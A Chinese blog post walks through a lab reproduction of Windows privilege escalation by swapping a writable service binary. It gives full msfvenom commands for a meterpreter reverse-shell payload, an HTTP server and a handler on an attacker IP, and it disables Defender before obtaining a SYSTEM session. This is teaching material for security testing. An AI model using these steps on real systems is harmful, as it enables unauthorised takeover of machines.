系统服务替换提权

于 2023-11-14 14:30:54 发布
阅读量144 收藏
点赞数
分类专栏: Windows提权 文章标签: 服务器 网络 windows linux 网络安全 tcp/ip 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46686336/article/details/134398219
版权

系统服务替换提权

一、漏洞原理和利用条件
1、原理

windows系统服务文件在操作系统启动时加载执行,并在后台调用可执行文件。如果一个低权限的用户对此类系统服务调用的可执行文件拥有写权限,那么就可以替换该文件,并随着系统启动获得控制权限。windows服务是以system权限运行的,其文件夹、文件和注册表key-value都是受强制访问控制保护的。但是在某些情况下,操作系统中依然存在一些没有得到有效保护的服务

2、利用条件

  • 看到服务执行路径可写

  • 原来的文件可以修改

  • 即可利用该漏洞

二、漏洞环境复原
1、开启漏洞服务

使用管理员权限开启服务

Microsoft Windows [版本 10.0.17134.228]
(c) 2018 Microsoft Corporation。保留所有权利。
#创建一个Test_server,调用地址为E:\bin\calc.exe,开机自启
C:\Users\Administrator>sc create Test_server binPath= "E:\bin\calc.exe" start= auto
[SC] CreateService 成功
#查询服务
C:\Users\Administrator>sc query Test_server

SERVICE_NAME: Test_server
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 1077  (0x435)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

在这里插入图片描述

2、基于普通用户修改权限

在这里插入图片描述

在这里插入图片描述

目前users组里的用户没有写入权限,所有我们得给个写入的权限,这里点击高级

在这里插入图片描述

这里需要禁用一下继承不然没办法修改users组的权限

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

好的这边漏洞环境已经,准备好了现在我们切换到test用户进行提权

3、关闭Defender

这里我们需要把Windows默认的防病毒关闭,实际情况可以使用免杀的木马进行绕过

在这里插入图片描述

永久关闭Defender

在这里插入图片描述

三、提权过程
1、Kali制作反弹shell木马
#生成木马,需要自动迁移进程
msf6 > msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.88.141 lport=4444 prependmigrateprocess=explorer.exe prependmigrate=true -f exe > windows.exe
[*] exec: msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.88.141 lport=4444 prependmigrateprocess=explorer.exe prependmigrate=true -f exe > windows.exe

Overriding user environment variable 'OPENSSL_CONF' to enable legacy functions.
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 901 bytes
Final size of exe file: 7168 bytes

msf6 > ls
[*] exec: ls

windows.exe

在这里插入图片描述

2、上传木马
#开启http服务
msf6 > python -m http.server 80
[*] exec: python -m http.server 80

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

在这里插入图片描述

3、Kali开启监听
msf6 > handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.88.141 -P 4444
[*] Payload handler running as background job 0.

[*] Started reverse TCP handler on 192.168.88.141:4444 
msf6 > jobs 

Jobs
====

  Id  Name                    Payload                              Payload opts
  --  ----                    -------                              ------------
  0   Exploit: multi/handler  windows/x64/meterpreter/reverse_tcp  tcp://192.168.88.141:4444

在这里插入图片描述

4、狸猫换太子

把计算器的名字更改,把我们的木马换成计算器的名字

在这里插入图片描述

重启计算机让服务启动起来,就把我们的木马给运行起来了

5、完成提权
msf6 > 
[*] Sending stage (200774 bytes) to 192.168.88.131
[*] Meterpreter session 1 opened (192.168.88.141:4444 -> 192.168.88.131:49668) at 2023-11-05 20:06:46 +0800

msf6 > sessions

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ DESKTOP-74FDETH  192.168.88.141:4444 -> 192.168.88.131:49668 (192.1
                                                                            68.88.131)

在这里插入图片描述

小冷爱学习!
关注
专栏目录
Windows提权---MSF/令牌窃取/系统服务权限配置错误提权
qq_40012781的博客
07-02 2351
提权是指把普通用户的权限进行提升至高权限的过程,也叫特权提升
windows系统提权
liweh的博客
07-18 288
1、内核溢出提权windows系统获取补丁: systeminfo或wmic qfe提权辅助工具: Windows-Exploit-Suggester(现在因为漏洞库不再更新,所以已经基本弃用systeminfo在windows系统上可以显示系统的各种信息主机名: WIN-AJC75HUE5HCOS 名称: Microsoft Windows Server 2008 R2 Standard。
MSF内网穿透
weixin_46686336的博客
11-08 458
MSF内网穿透
【msf】对tomcat进行msf渗透
qq_20410657的博客
10-08 303
使用辅助模块 auxiliary/scanner/http/tomcat_mgr_login 进行爆破。最好能拿下tomcat的管理界面,如果有可以进行爆破,拿下界面后对tomcat进行文件上传渗透提权
MSF手机渗透实验(未成功)(CVE-2019-2215 Binder UA)
qq_33163046的博客
03-03 5126
最近想利用metasploit对手机进行依次渗透实验。通过查看最近三年的安卓漏洞,我对CVE-2019-2215这个漏洞很感兴趣。幸运的是,metasploit里就有这个漏洞的攻击payload,于是我就开始试试了。在环境的准备中,你需要有一个kali环境。5分钟完成 Kali linux安装(基于VirtualBox)_virtualbox安装kali_晓翔仔的博客-CSDN博客倒数第二行就是我的中兴手机当然,你需要检查手机安卓的版本,已经只有该漏洞修复前的版本才有成功利用的理论可。
OpenSSL编译过程和报错解决
haiword的博客
10-22 2529
OpenSSL编译过程和遇到的问题 OpenSSL编译过程和遇到的问题 win764位系统。 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,Markdown 将代码片显示选择的高亮样式 进行展示; 增加了 图片拖拽 功能,你可以将本地的图片直接拖拽到编辑区域直接展示; 全新的 KaTeX数学公式 语法; 增加了支持甘特图的
fsck.ext3:unable to resolve
whyhonest的专栏
11-19 729
http://selboo.com.cn/post/707/ fsck.ext3:unable to resolve [ 2010/03/27 13:58 | by selboo ]  大 | 中 | 小  解决方法: 从错误来看是 无法识别 /data 分区 输入密码后进入 mount /dev/sda5 /data/ ; echo “ok
提权vbs代码
09-05
### 提权VBS代码解析与安全警示 #### 一、提权VBS代码概述 在IT领域中,提权操作是指通过某种手段使程序或用户的权限得到提升,从而能够执行原本受限的操作。本文将深入分析一份VBS(Visual Basic Script Edition...
服务器提权
12-14
如果被恶意利用,可能成为提权的手段,攻击者可以通过替换或篡改此文件以获取更高权限。另一个文件`蘇傢。℡网络服务器刷钻工具.exe`看起来像是一个带有可疑名称的可执行程序,这可能是某种工具,用于开启服务器...
本地微信DLL劫持提权复现
最新发布
weixin_46686336的博客
11-11 3518
DLL劫持提权Windows提权
CentOS6安装openssl-1.1.1版本可能遇到的问题及解决
航道的博客
02-26 7724
环境:CentOS6 OpenSSL版本:1.1.1d 安装步骤: 1、下载OpenSSL源代码包:https://www.openssl.org/source/openssl-1.1.1d.tar.gz 2、解压包:tar -zxvf openssl-1.1.1d.tar.gz 3、进入源代码目录:cd openssl-1.1.1d 4、./config --prefix=/usr/...
出现的问题
chuyuanguan6691的博客
09-25 117
第1个问题 linux 搭配php环境出现错误代码502 php-fpm 运行正常 nginx 运行正常 nginx 配置文件按照原配置文件配置 第3个问题 如果是团队开发,则可能希望应用程序中仍包含.env.example文件。因为通过在示例配置文件中放置占位值, 什么是示例...
OpenSSL安装配置
WeLoveSunFlower的专栏
12-11 4199
因为生成keystore文件需要用到openssl 命令,简单记录下windows下 openssl安装和配置过程 1. 直接从官网下载exe 下载地址:http://slproweb.com/products/Win32OpenSSL.html,下载完成后直接安装,可以安装到任意目录 2. 配置环境变量 打开 系统属性-高级系统设置-环境变量,在系统变量中新建一个系统变量,变量名为OPE...
Linux 安装OpenSSL及解决遇到的问题
持续学习,持续更新
01-08 5938
安装过程中会出现Can’t locate IPC/Cmd.pm in 错误。需要加上 --no-check-certificate 不做检查。装的挺麻烦的,浪费好几个小时,真是不容易。原因是动态路径找不到,加入动态库的路径。解决完这个问题之后重新配置就可以了。执行后如果拉不下来,出现证书过期。如果出现下面的错误 不需要管。错误解决方案为参考报错地址。使用ldd查看缺少那些库。去到配置的指定目录下。
windows php使用openssl生成自签名证书报错问题
Z.X的博客
03-17 851
2022年3月17日12:36:12 如果出现以下问题 openssl_csr_sign(): cannot get CSR from parameter 1 in openssl_x509_export(): cannot get cert from parameter 1 in openssl_pkcs12_export(): cannot get cert from parameter ...
Linux 安装OpenSSL出错的解决方法
weixin_30824479的博客
08-17 1528
以前编译php没有 –with–openssl 现在要使用到 openssl ,phpinze扩展安装,但是在make时候报错 今天找这个在网上找了大半天,最后总结应该是php版本本身的问题,错误是php编译好后,通过phpize单独添加时候报错的内容 推荐阅读: 生产环境实用之LNMP架构的编译安装+SSL加密实现http://www.linuxidc.com/Linux/2013-05...
03.openssl公钥的基础知识
艾小小雨的博客
12-22 1207
Chapter 3. Public Key Infrastructure (PKI) 我们在本章中的意图是给你一个理解PKI如何适应大局的基础。 PKI对于有效使用公钥密码系统非常重要,对于理解和使用SSL协议至关重要。 对PKI的全面讨论超出了本书的范围。 要进行更深入的讨论,我们推荐Russ Housley和Tim Polk(John Wiley&Sons)编写的“规划PKI:部署公...
openssl编译报错记录
qq_44534541的博客
05-09 5077
Operating system: x86_64-whatever-linux2 You need Perl 5 写在前面 这些问题你们几乎不会遇到,所以请你忽略这篇文章,嘿嘿。那么,为啥我遇到了这个问题呢?因为我们甲方提供的服务器它不能连接外网,不能使用yum命令安装组件,也没有本地的yum源,非常难受。就比如,我给你一台智能手机,你发现不能联网,不能安装自己需要的软件。 报错是这样的 Operating system: x86_64-whatever-linux2 You need Perl 5 [.
服务器提权技巧揭秘:C盘文件探索与权限策略
文档中的提权思路涵盖了从基础权限检查到深入系统目录探索,再到尝试调整服务权限和管理安全设置的过程。提权者需要密切关注这些路径,以找到可能的漏洞或利用点来提升服务器权限。同时,注意操作时的风险管理和权限...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值